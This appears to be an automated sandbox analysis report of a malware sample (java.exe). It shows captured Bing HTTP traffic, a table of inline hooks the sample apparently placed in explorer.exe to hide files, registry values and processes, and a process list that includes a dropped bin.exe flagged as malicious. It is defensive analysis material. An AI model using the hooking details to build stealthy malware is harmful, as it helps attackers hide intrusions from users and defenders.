                                                                                                                                                              X-Device-Touch: false
                                                                                                                                                              X-DeviceID: 01000A4109000CC6
                                                                                                                                                              X-MSEdge-ExternalExp: bfbwsbrs0830tf,d-thshldspcl40,msbdsborgv2co,msbwdsbi920t1,spofglclicksh-c2,webtophit0r_t,wsbmsaqfuxtc,wsbqfasmsall_t,wsbqfminiserp400,wsbref-t
                                                                                                                                                              X-MSEdge-ExternalExpType: JointCoord
                                                                                                                                                              X-PositionerType: Desktop
                                                                                                                                                              X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                                                                              X-Search-CortanaAvailableCapabilities: None
                                                                                                                                                              X-Search-SafeSearch: Moderate
                                                                                                                                                              X-Search-TimeZone: Bias=0; DaylightBias=-60; TimeZoneKeyName=GMT Standard Time
                                                                                                                                                              X-UserAgeClass: Unknown
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                              Host: www.bing.com
                                                                                                                                                              Content-Length: 2237
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Cookie: MUID=6666694284484FA1B35CCB433D42E997; _SS=SID=193A581F83766B4319784BBF829B6A16&CPID=1696420820117&AC=1&CPH=e5c79613&CBV=39942242; _EDGE_S=SID=193A581F83766B4319784BBF829B6A16; SRCHUID=V=2&GUID=BA43D82178364AEA9C1EE6C32BE93416&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231003; SRCHHPGUSR=SRCHLANG=en&LUT=1696420817741&IPMH=425591ef&IPMID=1696420817913&HV=1696417346; ANON=A=6D8F9DF00282E660E425530EFFFFFFFF; CortanaAppUID=4C9C2B2D0465FD7A42C74C7E93CFB630; MUIDB=6666694284484FA1B35CCB433D42E997
2024-01-20 19:41:14 UTC | 2237 | OUT | Data Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 36 36 36 36 36 39 34 32 38 34 34 38 34 46 41 31 42 33 35 43 43 42 34 33 33 44 34 32 45 39 39 37 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 38 39 32 46 41 30 37 38 38 36 34 31 34 42 44 46 38 45 45 31 37 36 34 41 35 39 46 46 33 39 43 36 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43
                                                                                                                                                              Data Ascii: <ClientInstRequest><CID>6666694284484FA1B35CCB433D42E997</CID><Events><E><T>Event.ClientInst</T><IG>892FA07886414BDF8EE1764A59FF39C6</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"C
2024-01-20 19:41:15 UTC | 476 | IN | HTTP/1.1 204 No Content
                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                              X-MSEdge-Ref: Ref A: CF9ECD651A424BE58C4A719B779CD7A9 Ref B: LAXEDGE1720 Ref C: 2024-01-20T19:41:15Z
                                                                                                                                                              Date: Sat, 20 Jan 2024 19:41:15 GMT
                                                                                                                                                              Connection: close
                                                                                                                                                              Alt-Svc: h3=":443"; ma=93600
                                                                                                                                                              X-CDN-TraceID: 0.20a6dc17.1705779675.1a1d24f5


                                                                                                                                                              Code Manipulations

Function Name        | Hook Type | Active in Processes
ZwResumeThread       | INLINE    | explorer.exe
NtQueryDirectoryFile | INLINE    | explorer.exe
ZwEnumerateValueKey  | INLINE    | explorer.exe
NtResumeThread       | INLINE    | explorer.exe
ZwCreateUserProcess  | INLINE    | explorer.exe
NtEnumerateValueKey  | INLINE    | explorer.exe
NtCreateUserProcess  | INLINE    | explorer.exe
ZwQueryDirectoryFile | INLINE    | explorer.exe

Function Name        | Hook Type | New Data
ZwResumeThread       | INLINE    | 0xE9 0x9E 0xE1 0x12 0x25 0x51
NtQueryDirectoryFile | INLINE    | 0xE9 0x98 0x81 0x12 0x29 0x91
ZwEnumerateValueKey  | INLINE    | 0xE9 0x9C 0xC1 0x12 0x2D 0xD1
NtResumeThread       | INLINE    | 0xE9 0x9E 0xE1 0x12 0x25 0x51
ZwCreateUserProcess  | INLINE    | 0xE9 0x93 0x31 0x11 0x17 0x71
NtEnumerateValueKey  | INLINE    | 0xE9 0x9C 0xC1 0x12 0x2D 0xD1
NtCreateUserProcess  | INLINE    | 0xE9 0x93 0x31 0x11 0x17 0x71
ZwQueryDirectoryFile | INLINE    | 0xE9 0x98 0x81 0x12 0x29 0x91


                                                                                                                                                              Target ID:0
                                                                                                                                                              Start time:20:40:52
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Users\user\Desktop\java.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Users\user\Desktop\java.exe
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:112'768 bytes
                                                                                                                                                              MD5 hash:B471D5F706DF69A4A28664D7E335A9DA
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:1
                                                                                                                                                              Start time:20:40:52
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:2
                                                                                                                                                              Start time:20:40:52
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\winver.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:winver
                                                                                                                                                              Imagebase:0x330000
                                                                                                                                                              File size:57'344 bytes
                                                                                                                                                              MD5 hash:B5471B0FB5402FC318C82C994C6BF84D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:moderate
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:3
                                                                                                                                                              Start time:20:40:53
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                              Imagebase:0x7ff72b770000
                                                                                                                                                              File size:5'141'208 bytes
                                                                                                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:4
                                                                                                                                                              Start time:20:41:01
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\sihost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:sihost.exe
                                                                                                                                                              Imagebase:0x7ff796ef0000
                                                                                                                                                              File size:111'616 bytes
                                                                                                                                                              MD5 hash:A21E7719D73D0322E2E7D61802CB8F80
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:moderate
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:5
                                                                                                                                                              Start time:20:41:01
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                                                                                              Imagebase:0x7ff6eef20000
                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:6
                                                                                                                                                              Start time:20:41:01
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService
                                                                                                                                                              Imagebase:0x7ff6eef20000
                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:7
                                                                                                                                                              Start time:20:41:02
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\ctfmon.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:ctfmon.exe
                                                                                                                                                              Imagebase:0x7ff7e3b00000
                                                                                                                                                              File size:11'264 bytes
                                                                                                                                                              MD5 hash:B625C18E177D5BEB5A6F6432CCF46FB3
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:moderate
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:8
                                                                                                                                                              Start time:20:41:02
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                                              Imagebase:0x7ff6eef20000
                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:9
                                                                                                                                                              Start time:20:41:02
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                              Imagebase:0x7ff7da970000
                                                                                                                                                              File size:793'416 bytes
                                                                                                                                                              MD5 hash:5CDDF06A40E89358807A2B9506F064D9
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:10
                                                                                                                                                              Start time:20:41:04
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                              Imagebase:0x7ff71e800000
                                                                                                                                                              File size:103'288 bytes
                                                                                                                                                              MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:moderate
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:11
                                                                                                                                                              Start time:20:41:04
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                              Imagebase:0x7ff6fdaa0000
                                                                                                                                                              File size:3'671'400 bytes
                                                                                                                                                              MD5 hash:5E1C9231F1F1DCBA168CA9F3227D9168
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:13
                                                                                                                                                              Start time:20:41:13
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe"
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:112'768 bytes
                                                                                                                                                              MD5 hash:CC18A03FCBC9DCF9DF31B64689EB3E55
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Antivirus matches:
                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:14
                                                                                                                                                              Start time:20:41:13
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:15
                                                                                                                                                              Start time:20:41:18
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                              Imagebase:0x7ff71e800000
                                                                                                                                                              File size:103'288 bytes
                                                                                                                                                              MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:16
                                                                                                                                                              Start time:20:41:19
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\smartscreen.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\System32\smartscreen.exe -Embedding
                                                                                                                                                              Imagebase:0x7ff7d45b0000
                                                                                                                                                              File size:2'378'752 bytes
                                                                                                                                                              MD5 hash:02FB7069B8D8426DC72C9D8A495AF55A
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:19
                                                                                                                                                              Start time:20:41:20
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
                                                                                                                                                              Imagebase:0x7ff794e20000
                                                                                                                                                              File size:19'232 bytes
                                                                                                                                                              MD5 hash:F050189D49E17D0D340DE52E9E5B711F
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:20
                                                                                                                                                              Start time:20:41:21
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe"
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:112'768 bytes
                                                                                                                                                              MD5 hash:CC18A03FCBC9DCF9DF31B64689EB3E55
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

Target ID:21
Start time:20:41:21
Start date:20/01/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:20:41:21
Start date:20/01/2024
Path:C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:0x7ff71e800000
File size:103'288 bytes
MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:23
Start time:20:41:23
Start date:20/01/2024
Path:C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:0x7ff71e800000
File size:103'288 bytes
MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:20:41:23
Start date:20/01/2024
Path:C:\Windows\System32\ApplicationFrameHost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\ApplicationFrameHost.exe -Embedding
Imagebase:0x7ff7d5d50000
File size:78'456 bytes
MD5 hash:D58A8A987A8DAFAD9DC32A548CC061E7
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:25
Start time:20:41:27
Start date:20/01/2024
Path:C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca
Imagebase:0x7ff63cc40000
File size:19'456 bytes
MD5 hash:6C44453CD661FC2DB18E4C09C4940399
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:26
Start time:20:41:28
Start date:20/01/2024
Path:C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:0x7ff71e800000
File size:103'288 bytes
MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:27
Start time:20:41:28
Start date:20/01/2024
Path:C:\Windows\ImmersiveControlPanel\SystemSettings.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
Imagebase:0x7ff614e70000
File size:98'104 bytes
MD5 hash:3CD3CD85226FCF576DFE9B70B6DA2630
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:28
Start time:20:41:31
Start date:20/01/2024
Path:C:\Windows\System32\oobe\UserOOBEBroker.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
Imagebase:0x7ff69a060000
File size:57'856 bytes
MD5 hash:BCE744909EB87F293A85830D02B3D6EB
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:29
Start time:20:41:32
Start date:20/01/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Imagebase:0x7ff6eef20000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:30
Start time:20:41:32
Start date:20/01/2024
Path:C:\Windows\System32\dllhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
Imagebase:0x7ff70f330000
File size:21'312 bytes
MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:31
Start time:20:41:33
Start date:20/01/2024
Path:C:\Windows\SysWOW64\cscript.exe
Wow64 process (32bit):true
Commandline:"cscript" "C:\Program Files (x86)\Microsoft Office\Office16\OSPP.VBS" /dstatus
Imagebase:0xc60000
File size:144'896 bytes
MD5 hash:CB601B41D4C8074BE8A84AED564A94DC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:32
Start time:20:41:33
Start date:20/01/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0x4
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:33
Start time:20:41:33
Start date:20/01/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0x4
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:34
Start time:20:41:34
Start date:20/01/2024
Path:C:\Windows\System32\backgroundTaskHost.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX4325622ft6437f3xfywcfxgbedfvpn0x.mca
Imagebase:0x7ff6ec4b0000
File size:19'776 bytes
MD5 hash:DA7063B17DBB8BBB3015351016868006
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:35
Start time:20:41:34
Start date:20/01/2024
Path:C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:0x7ff71e800000
File size:103'288 bytes
                                                                                                                                                              MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:36
                                                                                                                                                              Start time:20:41:35
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                              Imagebase:0x7ff71e800000
                                                                                                                                                              File size:103'288 bytes
                                                                                                                                                              MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:37
                                                                                                                                                              Start time:20:41:35
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe"
                                                                                                                                                              Imagebase:0xba0000
                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:38
                                                                                                                                                              Start time:20:41:35
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe"
                                                                                                                                                              Imagebase:0xba0000
                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:39
                                                                                                                                                              Start time:20:41:36
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe"
                                                                                                                                                              Imagebase:0xba0000
                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:40
                                                                                                                                                              Start time:20:41:36
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe"
                                                                                                                                                              Imagebase:0xba0000
                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:41
                                                                                                                                                              Start time:20:41:36
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe
